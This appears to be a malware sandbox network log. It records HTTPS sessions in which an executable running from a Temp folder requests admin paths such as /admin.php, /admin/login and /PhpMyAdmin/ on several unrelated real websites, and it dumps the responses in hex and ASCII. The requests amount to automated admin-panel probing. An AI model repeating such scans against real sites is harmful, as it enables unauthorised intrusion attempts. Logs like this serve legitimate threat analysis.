2023-12-22 20:15:08 UTC	164	OUT	GET / HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:08 UTC	928	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: max-age=0 Expires: Fri, 22 Dec 2023 20:15:08 GMT Last-Modified: Fri, 22 Dec 2023 20:11:00 GMT Vary: X-Forwarded-Proto,Accept-Encoding,User-Agent Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aqR4MkR5U3jE6BBDrY8Feo%2FDiXNykOnyxYSo8IfcYgCCwbpzgFjsNjAh4ShY1Nn7X2CDMQRohgYWXLyOPjBaiHIaxZT9BODhI4jEm7aRuwLH5KfzLfI7jmtC7k8PkYQiwg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b08fd3dfa287e-MIA alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:08 UTC	1369	IN	Data Raw: 37 66 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 63 6c 61 73 73 3d 22 6c 6f 61 64 69 6e 67 2d 73 69 74 65 20 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 68 74 6d 6c 29 7b 68 74 6d 6c 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 68 74 6d 6c 2e 63 6c 61 73 73 4e 61 6d 65 2e 72 65 70 6c 61 63 65 28 2f 5c 62 6e Data Ascii: 7fe3<!DOCTYPE html><html lang="en-US" prefix="og: https://ogp.me/ns#" class="loading-site no-js"><head><meta charset="UTF-8" /><link rel="profile" href="https://gmpg.org/xfn/11" /><script>(function(html){html.className = html.className.replace(/\bn
2023-12-22 20:15:08 UTC	1369	IN	Data Raw: 70 72 6f 70 65 72 74 79 3d 22 61 72 74 69 63 6c 65 3a 70 75 62 6c 69 73 68 65 64 5f 74 69 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 32 30 32 30 2d 31 31 2d 30 35 54 30 37 3a 30 34 3a 34 37 2d 30 35 3a 30 30 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 61 72 74 69 63 6c 65 3a 6d 6f 64 69 66 69 65 64 5f 74 69 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 32 30 32 33 2d 31 32 2d 32 30 54 31 34 3a 31 38 3a 34 36 2d 30 35 3a 30 30 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 76 69 64 65 6f 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 32 2f 30 32 2f 63 61 6e 6e 61 62 69 73 2d 6c 65 61 76 65 73 2d 62 61 6e Data Ascii: property="article:published_time" content="2020-11-05T07:04:47-05:00" /><meta property="article:modified_time" content="2023-12-20T14:18:46-05:00" /><meta property="og:video" content="https://cannaclear.com/wp-content/uploads/2022/02/cannabis-leaves-ban
2023-12-22 20:15:08 UTC	1369	IN	Data Raw: 6b 2e 73 6c 69 64 65 72 2e 6a 73 3f 76 65 72 3d 33 2e 31 38 2e 30 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 66 6c 61 74 73 6f 6d 65 2f 61 73 73 65 74 73 2f 6a 73 2f 63 68 75 6e 6b 2e 70 6f 70 75 70 73 2e 6a 73 3f 76 65 72 3d 33 2e 31 38 2e 30 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 66 6c 61 74 73 6f 6d 65 2f 61 73 73 65 74 73 2f 6a 73 2f 63 68 75 6e 6b 2e 74 6f 6f 6c 74 69 70 73 2e 6a 73 3f 76 65 72 3d 33 Data Ascii: k.slider.js?ver=3.18.0" /><link rel="prefetch" href="https://cannaclear.com/wp-content/themes/flatsome/assets/js/chunk.popups.js?ver=3.18.0" /><link rel="prefetch" href="https://cannaclear.com/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3
2023-12-22 20:15:08 UTC	1369	IN	Data Raw: 2d 70 72 6f 2f 62 75 69 6c 64 2f 73 74 79 6c 65 2d 70 6f 69 6e 74 2d 73 65 6c 65 63 74 69 6f 6e 2d 62 6c 6f 63 6b 2e 63 73 73 3f 76 65 72 3d 31 37 30 31 37 36 31 34 37 36 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 22 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67 2e 65 6d 6f 6a 69 20 7b 0a 09 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 Data Ascii: -pro/build/style-point-selection-block.css?ver=1701761476" type="text/css" media="all" /><style id="wp-emoji-styles-inline-css" type="text/css">img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !imp
2023-12-22 20:15:08 UTC	1369	IN	Data Raw: 33 35 64 65 67 2c 23 30 30 64 30 38 34 2c 23 30 36 39 33 65 33 29 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 70 75 72 70 6c 65 2d 63 72 75 73 68 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 23 33 34 65 32 65 34 2c 23 34 37 32 31 66 62 20 35 30 25 2c 23 61 62 31 64 66 65 29 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 68 61 7a 79 2d 64 61 77 6e 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 23 66 61 61 63 61 38 2c 23 64 61 64 30 65 63 29 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 73 75 62 64 75 65 64 2d 6f 6c 69 76 65 2d 67 72 61 64 69 65 6e 74 Data Ascii: 35deg,#00d084,#0693e3)}:root .has-purple-crush-gradient-background{background:linear-gradient(135deg,#34e2e4,#4721fb 50%,#ab1dfe)}:root .has-hazy-dawn-gradient-background{background:linear-gradient(135deg,#faaca8,#dad0ec)}:root .has-subdued-olive-gradient
2023-12-22 20:15:08 UTC	1369	IN	Data Raw: 70 61 64 64 69 6e 67 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 70 78 7d 2e 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 74 65 78 74 3a 66 6f 63 75 73 7b 63 6c 69 70 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 64 64 3b 2d 77 65 62 6b 69 74 2d 63 6c 69 70 2d 70 61 74 68 3a 6e 6f 6e 65 3b 63 6c 69 70 2d 70 61 74 68 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 34 34 34 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6c 65 66 74 3a 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 20 32 33 70 78 20 31 34 70 78 3b 74 65 78 74 2d 64 65 63 6f Data Ascii: padding:0;position:absolute;width:1px}.screen-reader-text:focus{clip:auto!important;background-color:#ddd;-webkit-clip-path:none;clip-path:none;color:#444;display:block;font-size:1em;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-deco
2023-12-22 20:15:08 UTC	1369	IN	Data Raw: 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 75 73 74 6f 6d 65 72 2d 72 65 76 69 65 77 73 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 2f 63 73 73 2f 66 72 6f 6e 74 65 6e 64 2e 63 73 73 3f 76 65 72 3d 31 37 30 33 30 30 31 38 31 37 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 77 72 2d 66 72 6f 6e 74 65 6e 64 2d 65 6c 65 6d 65 6e 74 73 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 72 65 77 61 72 64 73 2f 73 74 79 6c 69 6e 67 2f 63 73 73 2f 77 72 2d 65 6c 65 6d 65 6e 74 73 2e 6d 69 6e 2e 63 73 Data Ascii: /wp-content/plugins/customer-reviews-woocommerce/css/frontend.css?ver=1703001817" type="text/css" media="all" /><link rel="stylesheet" id="wr-frontend-elements-css" href="https://cannaclear.com/wp-content/plugins/woorewards/styling/css/wr-elements.min.cs
2023-12-22 20:15:08 UTC	1369	IN	Data Raw: 76 65 72 3d 35 2e 32 2e 38 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 64 61 74 61 2d 6d 69 6e 69 66 79 3d 22 31 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 77 63 2d 6d 6e 6d 2d 66 72 6f 6e 74 65 6e 64 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 2f 31 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 78 2d 61 6e 64 2d 6d 61 74 63 68 2d 70 72 6f 64 75 63 74 73 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 72 6f 6e 74 65 6e 64 2f 6d 6e 6d 2d 66 72 6f 6e 74 65 6e 64 2e 6d 69 6e 2e 63 73 73 3f 76 65 Data Ascii: ver=5.2.8" type="text/css" media="all" /><link data-minify="1" rel="stylesheet" id="wc-mnm-frontend-css" href="https://cannaclear.com/wp-content/cache/min/1/wp-content/plugins/woocommerce-mix-and-match-products/assets/css/frontend/mnm-frontend.min.css?ve
2023-12-22 20:15:08 UTC	1369	IN	Data Raw: 6f 73 77 69 70 65 2f 70 68 6f 74 6f 73 77 69 70 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 38 2e 34 2e 30 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 70 68 6f 74 6f 73 77 69 70 65 2d 64 65 66 61 75 6c 74 2d 73 6b 69 6e 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2f 61 73 73 65 74 73 2f 63 73 73 2f 70 68 6f 74 6f 73 77 69 70 65 2f 64 65 66 61 75 6c 74 2d 73 6b 69 6e 2f 64 65 66 61 75 6c 74 2d 73 6b 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 38 2e 34 2e 30 22 20 74 79 70 65 Data Ascii: oswipe/photoswipe.min.css?ver=8.4.0" type="text/css" media="all" /><link rel="stylesheet" id="photoswipe-default-skin-css" href="https://cannaclear.com/wp-content/plugins/woocommerce/assets/css/photoswipe/default-skin/default-skin.min.css?ver=8.4.0" type
2023-12-22 20:15:08 UTC	1369	IN	Data Raw: 6e 74 2d 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 09 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 66 6c 61 74 73 6f 6d 65 2f 61 73 73 65 74 73 2f 63 73 73 2f 69 63 6f 6e 73 2f 66 6c 2d 69 63 6f 6e 73 2e 65 6f 74 3f 76 3d 33 2e 31 38 2e 30 29 3b 0a 09 09 09 09 73 72 63 3a 0a 09 09 09 09 09 75 72 6c 28 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 66 6c 61 74 73 6f 6d 65 2f 61 73 73 65 74 73 2f 63 73 73 2f 69 63 6f 6e 73 2f 66 6c 2d 69 63 6f 6e 73 2e 65 6f 74 23 69 65 66 69 78 3f 76 3d 33 2e 31 38 2e 30 29 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64 65 64 2d 6f Data Ascii: nt-display: block;src: url(https://cannaclear.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.18.0);src:url(https://cannaclear.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot#iefix?v=3.18.0) format("embedded-o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
262	192.168.2.4	51986	167.235.0.29	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:08 UTC	183	OUT	GET /admin.php HTTP/1.1 Host: www.fotoestudiomiret.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:08 UTC	382	IN	Data Raw: 48 54 54 50 2f 31 2e 30 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 32 20 44 65 63 20 32 30 32 33 20 32 30 3a 31 35 3a 30 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 20 31 3b 20 6d 6f 64 65 3d 62 6c 6f 63 6b 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 3a 20 2a 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 Data Ascii: HTTP/1.0 404 Not FoundDate: Fri, 22 Dec 2023 20:15:08 GMTServer: ApacheX-XSS-Protection: 1; mode=blockAccess-Control-Allow-Origin: Access-Control-Allow-Headers: Access-Control-Allow-Methods: Access-Control-Request-Method: Content-Secur
2023-12-22 20:15:08 UTC	7810	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 0d 0a 20 20 20 20 0a 3c 73 74 79 6c 65 3e 0a 68 74 6d 6c 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 74 6f 65 73 74 75 64 69 6f 6d 69 72 65 74 2e 63 6f 6d 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 Data Ascii: <!DOCTYPE html><html lang="es"> <head> <style>html,body{background-color:;}</style><base href="https://www.fotoestudiomiret.com" /><meta charset="utf-8" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http
2023-12-22 20:15:08 UTC	16384	IN	Data Raw: 69 6f 6e 2d 63 69 72 63 6c 65 22 2c 22 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 22 3a 22 66 61 73 20 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 22 2c 22 65 78 63 6c 61 6d 61 74 69 6f 6e 22 3a 22 66 61 73 20 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 22 2c 22 65 78 70 61 6e 64 22 3a 22 66 61 73 20 66 61 2d 65 78 70 61 6e 64 22 2c 22 65 78 74 65 72 6e 61 6c 2d 6c 69 6e 6b 22 3a 22 66 61 73 20 66 61 2d 65 78 74 65 72 6e 61 6c 2d 6c 69 6e 6b 22 2c 22 65 79 65 22 3a 22 66 61 73 20 66 61 2d 65 79 65 22 2c 22 65 79 65 2d 73 6c 61 73 68 22 3a 22 66 61 73 20 66 61 2d 65 79 65 2d 73 6c 61 73 68 22 2c 22 66 61 63 65 2d 67 72 69 6e 22 3a 22 66 61 73 20 66 61 2d 67 72 69 6e 22 2c 22 66 61 63 65 62 6f 6f 6b 22 3a 22 66 61 62 Data Ascii: ion-circle","exclamation-triangle":"fas fa-exclamation-triangle","exclamation":"fas fa-exclamation","expand":"fas fa-expand","external-link":"fas fa-external-link","eye":"fas fa-eye","eye-slash":"fas fa-eye-slash","face-grin":"fas fa-grin","facebook":"fab

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
263	192.168.2.4	52689	34.206.39.153	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:08 UTC	210	OUT	GET /admin/login HTTP/1.1 Host: aldine.org.com Accept: / Accept-Encoding: deflate, gzip Cookie: SERVERID=vpc3\|ZYXxK\|ZYXxJ User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:08 UTC	1367	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Dec 2023 20:15:08 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Download-Options: noopen X-Permitted-Cross-Domain-Policies: none Referrer-Policy: strict-origin-when-cross-origin Link: </assets/admin-c3cec993e40a8cbbfbec9ac43929a8f741267c75edd87a27f07fe71f4648779e.css>; rel=preload; as=style; nopush,</packs/js/application-28182f954f58ae153a93.js>; rel=preload; as=script; nopush,</packs/js/admin-41c10d089a9b82c4a81b.js>; rel=preload; as=script; nopush,</packs/js/tablednd-7691ec9e4b7721f2be15.js>; rel=preload; as=script; nopush Vary: Accept ETag: W/"7a8fec796236bb22b327c2fcaf0659d9" Cache-Control: max-age=0, private, must-revalidate Set-Cookie: _digiadmin3_session=0ns%2Bj2p4%2FK9w%2Bfdke%2Fczw0%2BR7Nd4Cy2lvJUx6dBX%2BtE%2BU8h0gbRIz6sUUFEW2e8903RjZ96GuB2mGZO4WebB%2BQjZe9keAT6rGDnQWP8OUgqgH1JbGVhf5bqFMFfIVrcT%2BZoTxjlCwbi6fEPmxueMwhmNxXaQphFwWtCyv9O5%2BJSf52bLh%2BmCTXHKQmuR%2FJFXDnW%2F%2FTAl2cKKYjopSkDjt7PZGMjB%2BW0MLYQ50EOtT5k1rVeC%2FGH4wuvOK0O%2B7hOAGz5JzQl%2Bt4qrjGp4YhyiZhE0VTRt9ELjU0tH--zUOsK2FULIjQ3SQ5--sRkggof6NaNkWnFigb0D7w%3D%3D; path=/; HttpOnly; SameSite=Lax X-Request-Id: 887c4b2d-4733-4ca8-812d-48a133421fcd X-Runtime: 0.029519
2023-12-22 20:15:08 UTC	5725	IN	Data Raw: 62 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 64 6d 69 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 61 64 6d 69 6e 2d 63 33 63 65 63 39 39 33 65 34 30 61 38 63 62 62 66 62 65 63 39 61 63 34 33 39 32 39 61 38 66 37 34 31 32 36 37 63 37 35 65 64 64 38 37 61 32 37 66 30 37 66 65 37 31 66 34 36 34 38 37 37 39 65 2e 63 73 73 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 61 63 6b 73 2f 6a 73 2f 61 70 70 6c 69 63 61 74 69 6f 6e 2d 32 38 31 38 32 66 39 35 34 66 35 38 61 65 31 35 33 61 39 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c Data Ascii: b1c<!DOCTYPE html><html><head><title>Admin</title><link rel="stylesheet" media="all" href="/assets/admin-c3cec993e40a8cbbfbec9ac43929a8f741267c75edd87a27f07fe71f4648779e.css" /><script src="/packs/js/application-28182f954f58ae153a93.js"></script><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
264	192.168.2.4	52129	91.132.253.137	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:08 UTC	179	OUT	GET /index.php HTTP/1.1 Host: flandria-loisirs.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:08 UTC	533	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:15:08 GMT Server: Apache X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=300 Upgrade: h2,h2c Connection: Upgrade, close Location: https://www.flandria-loisirs.com/index.php/ Cache-Control: max-age=0 Expires: Fri, 22 Dec 2023 20:15:08 GMT X-XSS-Protection: 1; mode=block Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; img-src * data: blob: 'unsafe-inline'; Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:15:08 UTC	430	IN	Data Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6c 61 6e 64 72 69 61 2d 6c 6f 69 73 69 72 73 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6c 61 6e 64 72 69 61 2d 6c 6f 69 73 69 72 73 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: 1a2<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://www.flandria-loisirs.com/index.php/'" /> <title>Redirecting to https://www.flandria-loisirs.com/index.php/</title>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
265	192.168.2.4	52133	167.235.0.29	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:08 UTC	185	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: www.fotoestudiomiret.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:08 UTC	382	IN	Data Raw: 48 54 54 50 2f 31 2e 30 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 32 20 44 65 63 20 32 30 32 33 20 32 30 3a 31 35 3a 30 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 20 31 3b 20 6d 6f 64 65 3d 62 6c 6f 63 6b 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 3a 20 2a 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 Data Ascii: HTTP/1.0 404 Not FoundDate: Fri, 22 Dec 2023 20:15:08 GMTServer: ApacheX-XSS-Protection: 1; mode=blockAccess-Control-Allow-Origin: Access-Control-Allow-Headers: Access-Control-Allow-Methods: Access-Control-Request-Method: Content-Secur
